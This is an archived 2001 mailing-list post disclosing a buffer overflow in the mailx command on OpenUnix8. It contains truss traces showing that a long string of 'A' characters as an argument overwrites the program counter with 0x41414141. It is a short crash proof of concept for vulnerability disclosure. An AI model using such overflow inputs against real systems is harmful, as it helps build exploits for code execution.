Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

OpenUnix8 mailx command line overflow

From: dotslash () snosoft com
Date: Sun, 21 Oct 2001 12:52:10 -0700



/bin/mail is a symlink to mailx. mailx is not suid however it suffers
from a common buffer overflow
-KF

# truss mail `perl -e 'print "A" x 5122'`
execve("/bin/mail", 0x08045F18, 0x08045F24)  argc = 2
open("//.mailrc", O_RDONLY, 0666)               Err#2  ENOENT
     Incurred fault #6, FLTBOUNDS  %pc = 0x202C4141
       siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
     Received signal #11, SIGSEGV [default]
       siginfo: SIGSEGV SEGV_MAPERR addr=0x202C4141
         *** process killed ***



# truss mail `perl -e 'print "A" x 5124'`
     Incurred fault #6, FLTBOUNDS  %pc = 0x41414141
       siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
     Received signal #11, SIGSEGV [default]
       siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
         *** process killed ***
Previous By Date Next
Previous By Thread Next

Current thread: